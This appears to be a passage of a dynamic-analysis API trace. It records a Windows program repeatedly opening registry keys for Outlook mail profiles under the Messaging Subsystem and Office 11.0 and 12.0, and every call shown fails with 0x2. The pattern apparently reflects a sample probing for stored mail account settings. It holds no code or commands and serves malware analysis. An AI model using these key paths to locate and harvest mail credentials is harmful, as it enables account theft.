[0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.146] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x1c4ef00 | out: phkResult=0x1c4ef00*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.146] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.147] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.148] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.149] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook", phkResult=0x1c4ef00 | out: phkResult=0x1c4ef00*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.149] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, 